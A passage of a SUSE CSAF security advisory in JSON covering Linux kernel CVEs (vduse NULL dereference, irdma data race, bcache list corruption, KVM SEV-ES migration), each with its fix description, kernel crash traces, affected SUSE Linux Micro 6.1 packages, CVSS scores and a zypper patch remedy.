"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54289"
},
{
"cve": "CVE-2023-54291",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54291"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvduse: fix NULL pointer dereference\n\nvduse_vdpa_set_vq_affinity callback can be called\nwith NULL value as cpu_mask when deleting the vduse\ndevice.\n\nThis patch resets virtqueue\u0027s IRQ affinity mask value\nto set all CPUs instead of dereferencing NULL cpu_mask.\n\n[ 4760.952149] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 4760.959110] #PF: supervisor read access in kernel mode\n[ 4760.964247] #PF: error_code(0x0000) - not-present page\n[ 4760.969385] PGD 0 P4D 0\n[ 4760.971927] Oops: 0000 [#1] PREEMPT SMP PTI\n[ 4760.976112] CPU: 13 PID: 2346 Comm: vdpa Not tainted 6.4.0-rc6+ #4\n[ 4760.982291] Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.8.1 06/26/2020\n[ 4760.989769] RIP: 0010:memcpy_orig+0xc5/0x130\n[ 4760.994049] Code: 16 f8 4c 89 07 4c 89 4f 08 4c 89 54 17 f0 4c 89 5c 17 f8 c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 83 fa 08 72 1b \u003c4c\u003e 8b 06 4c 8b 4c 16 f8 4c 89 07 4c 89 4c 17 f8 c3 cc cc cc cc 66\n[ 4761.012793] RSP: 0018:ffffb1d565abb830 EFLAGS: 00010246\n[ 4761.018020] RAX: ffff9f4bf6b27898 RBX: ffff9f4be23969c0 RCX: ffff9f4bcadf6400\n[ 4761.025152] RDX: 0000000000000008 RSI: 0000000000000000 RDI: ffff9f4bf6b27898\n[ 4761.032286] RBP: 0000000000000000 R08: 0000000000000008 R09: 0000000000000000\n[ 4761.039416] R10: 0000000000000000 R11: 0000000000000600 R12: 0000000000000000\n[ 4761.046549] R13: 0000000000000000 R14: 0000000000000080 R15: ffffb1d565abbb10\n[ 4761.053680] FS: 00007f64c2ec2740(0000) GS:ffff9f635f980000(0000) knlGS:0000000000000000\n[ 4761.061765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 4761.067513] CR2: 0000000000000000 CR3: 0000001875270006 CR4: 00000000007706e0\n[ 4761.074645] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 4761.081775] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 4761.088909] PKRU: 55555554\n[ 4761.091620] Call Trace:\n[ 4761.094074] \u003cTASK\u003e\n[ 4761.096180] ? __die+0x1f/0x70\n[ 4761.099238] ? page_fault_oops+0x171/0x4f0\n[ 4761.103340] ? exc_page_fault+0x7b/0x180\n[ 4761.107265] ? asm_exc_page_fault+0x22/0x30\n[ 4761.111460] ? memcpy_orig+0xc5/0x130\n[ 4761.115126] vduse_vdpa_set_vq_affinity+0x3e/0x50 [vduse]\n[ 4761.120533] virtnet_clean_affinity.part.0+0x3d/0x90 [virtio_net]\n[ 4761.126635] remove_vq_common+0x1a4/0x250 [virtio_net]\n[ 4761.131781] virtnet_remove+0x5d/0x70 [virtio_net]\n[ 4761.136580] virtio_dev_remove+0x3a/0x90\n[ 4761.140509] device_release_driver_internal+0x19b/0x200\n[ 4761.145742] bus_remove_device+0xc2/0x130\n[ 4761.149755] device_del+0x158/0x3e0\n[ 4761.153245] ? kernfs_find_ns+0x35/0xc0\n[ 4761.157086] device_unregister+0x13/0x60\n[ 4761.161010] unregister_virtio_device+0x11/0x20\n[ 4761.165543] device_release_driver_internal+0x19b/0x200\n[ 4761.170770] bus_remove_device+0xc2/0x130\n[ 4761.174782] device_del+0x158/0x3e0\n[ 4761.178276] ? __pfx_vdpa_name_match+0x10/0x10 [vdpa]\n[ 4761.183336] device_unregister+0x13/0x60\n[ 4761.187260] vdpa_nl_cmd_dev_del_set_doit+0x63/0xe0 [vdpa]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54291",
"url": "https://www.suse.com/security/cve/CVE-2023-54291"
},
{
"category": "external",
"summary": "SUSE Bug 1255798 for CVE-2023-54291",
"url": "https://bugzilla.suse.com/1255798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54291"
},
{
"cve": "CVE-2023-54292",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54292"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix data race on CQP request done\n\nKCSAN detects a data race on cqp_request-\u003erequest_done memory location\nwhich is accessed locklessly in irdma_handle_cqp_op while being\nupdated in irdma_cqp_ce_handler.\n\nAnnotate lockless intent with READ_ONCE/WRITE_ONCE to avoid any\ncompiler optimizations like load fusing and/or KCSAN warning.\n\n[222808.417128] BUG: KCSAN: data-race in irdma_cqp_ce_handler [irdma] / irdma_wait_event [irdma]\n\n[222808.417532] write to 0xffff8e44107019dc of 1 bytes by task 29658 on cpu 5:\n[222808.417610] irdma_cqp_ce_handler+0x21e/0x270 [irdma]\n[222808.417725] cqp_compl_worker+0x1b/0x20 [irdma]\n[222808.417827] process_one_work+0x4d1/0xa40\n[222808.417835] worker_thread+0x319/0x700\n[222808.417842] kthread+0x180/0x1b0\n[222808.417852] ret_from_fork+0x22/0x30\n\n[222808.417918] read to 0xffff8e44107019dc of 1 bytes by task 29688 on cpu 1:\n[222808.417995] irdma_wait_event+0x1e2/0x2c0 [irdma]\n[222808.418099] irdma_handle_cqp_op+0xae/0x170 [irdma]\n[222808.418202] irdma_cqp_cq_destroy_cmd+0x70/0x90 [irdma]\n[222808.418308] irdma_puda_dele_rsrc+0x46d/0x4d0 [irdma]\n[222808.418411] irdma_rt_deinit_hw+0x179/0x1d0 [irdma]\n[222808.418514] irdma_ib_dealloc_device+0x11/0x40 [irdma]\n[222808.418618] ib_dealloc_device+0x2a/0x120 [ib_core]\n[222808.418823] __ib_unregister_device+0xde/0x100 [ib_core]\n[222808.418981] ib_unregister_device+0x22/0x40 [ib_core]\n[222808.419142] irdma_ib_unregister_device+0x70/0x90 [irdma]\n[222808.419248] i40iw_close+0x6f/0xc0 [irdma]\n[222808.419352] i40e_client_device_unregister+0x14a/0x180 [i40e]\n[222808.419450] i40iw_remove+0x21/0x30 [irdma]\n[222808.419554] auxiliary_bus_remove+0x31/0x50\n[222808.419563] device_remove+0x69/0xb0\n[222808.419572] device_release_driver_internal+0x293/0x360\n[222808.419582] driver_detach+0x7c/0xf0\n[222808.419592] bus_remove_driver+0x8c/0x150\n[222808.419600] driver_unregister+0x45/0x70\n[222808.419610] auxiliary_driver_unregister+0x16/0x30\n[222808.419618] irdma_exit_module+0x18/0x1e [irdma]\n[222808.419733] __do_sys_delete_module.constprop.0+0x1e2/0x310\n[222808.419745] __x64_sys_delete_module+0x1b/0x30\n[222808.419755] do_syscall_64+0x39/0x90\n[222808.419763] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[222808.419829] value changed: 0x01 -\u003e 0x03",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54292",
"url": "https://www.suse.com/security/cve/CVE-2023-54292"
},
{
"category": "external",
"summary": "SUSE Bug 1255800 for CVE-2023-54292",
"url": "https://bugzilla.suse.com/1255800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54292"
},
{
"cve": "CVE-2023-54293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54293"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbcache: fixup btree_cache_wait list damage\n\nWe get a kernel crash about \"list_add corruption. next-\u003eprev should be\nprev (ffff9c801bc01210), but was ffff9c77b688237c.\n(next=ffffae586d8afe68).\"\n\ncrash\u003e struct list_head 0xffff9c801bc01210\nstruct list_head {\n next = 0xffffae586d8afe68,\n prev = 0xffffae586d8afe68\n}\ncrash\u003e struct list_head 0xffff9c77b688237c\nstruct list_head {\n next = 0x0,\n prev = 0x0\n}\ncrash\u003e struct list_head 0xffffae586d8afe68\nstruct list_head struct: invalid kernel virtual address: ffffae586d8afe68 type: \"gdb_readmem_callback\"\nCannot access memory at address 0xffffae586d8afe68\n\n[230469.019492] Call Trace:\n[230469.032041] prepare_to_wait+0x8a/0xb0\n[230469.044363] ? bch_btree_keys_free+0x6c/0xc0 [escache]\n[230469.056533] mca_cannibalize_lock+0x72/0x90 [escache]\n[230469.068788] mca_alloc+0x2ae/0x450 [escache]\n[230469.080790] bch_btree_node_get+0x136/0x2d0 [escache]\n[230469.092681] bch_btree_check_thread+0x1e1/0x260 [escache]\n[230469.104382] ? finish_wait+0x80/0x80\n[230469.115884] ? bch_btree_check_recurse+0x1a0/0x1a0 [escache]\n[230469.127259] kthread+0x112/0x130\n[230469.138448] ? kthread_flush_work_fn+0x10/0x10\n[230469.149477] ret_from_fork+0x35/0x40\n\nbch_btree_check_thread() and bch_dirty_init_thread() may call\nmca_cannibalize() to cannibalize other cached btree nodes. Only one thread\ncan do it at a time, so the op of other threads will be added to the\nbtree_cache_wait list.\n\nWe must call finish_wait() to remove op from btree_cache_wait before free\nit\u0027s memory address. Otherwise, the list will be damaged. Also should call\nbch_cannibalize_unlock() to release the btree_cache_alloc_lock and wake_up\nother waiters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54293",
"url": "https://www.suse.com/security/cve/CVE-2023-54293"
},
{
"category": "external",
"summary": "SUSE Bug 1255801 for CVE-2023-54293",
"url": "https://bugzilla.suse.com/1255801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54293"
},
{
"cve": "CVE-2023-54296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Get source vCPUs from source VM for SEV-ES intrahost migration\n\nFix a goof where KVM tries to grab source vCPUs from the destination VM\nwhen doing intrahost migration. Grabbing the wrong vCPU not only hoses\nthe guest, it also crashes the host due to the VMSA pointer being left\nNULL.\n\n BUG: unable to handle page fault for address: ffffe38687000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] SMP NOPTI\n CPU: 39 PID: 17143 Comm: sev_migrate_tes Tainted: GO 6.5.0-smp--fff2e47e6c3b-next #151\n Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.28.0 07/10/2023\n RIP: 0010:__free_pages+0x15/0xd0\n RSP: 0018:ffff923fcf6e3c78 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffffe38687000000 RCX: 0000000000000100\n RDX: 0000000000000100 RSI: 0000000000000000 RDI: ffffe38687000000\n RBP: ffff923fcf6e3c88 R08: ffff923fcafb0000 R09: 0000000000000000\n R10: 0000000000000000 R11: ffffffff83619b90 R12: ffff923fa9540000\n R13: 0000000000080007 R14: ffff923f6d35d000 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff929d0d7c0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffe38687000000 CR3: 0000005224c34005 CR4: 0000000000770ee0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n sev_free_vcpu+0xcb/0x110 [kvm_amd]\n svm_vcpu_free+0x75/0xf0 [kvm_amd]\n kvm_arch_vcpu_destroy+0x36/0x140 [kvm]\n kvm_destroy_vcpus+0x67/0x100 [kvm]\n kvm_arch_destroy_vm+0x161/0x1d0 [kvm]\n kvm_put_kvm+0x276/0x560 [kvm]\n kvm_vm_release+0x25/0x30 [kvm]\n __fput+0x106/0x280\n ____fput+0x12/0x20\n task_work_run+0x86/0xb0\n do_exit+0x2e3/0x9c0\n do_group_exit+0xb1/0xc0\n __x64_sys_exit_group+0x1b/0x20\n do_syscall_64+0x41/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n \u003c/TASK\u003e\n CR2: ffffe38687000000",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54296",
"url": "https://www.suse.com/security/cve/CVE-2023-54296"
},
{
"category": "external",
"summary": "SUSE Bug 1255793 for CVE-2023-54296",
"url": "https://bugzilla.suse.com/1255793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
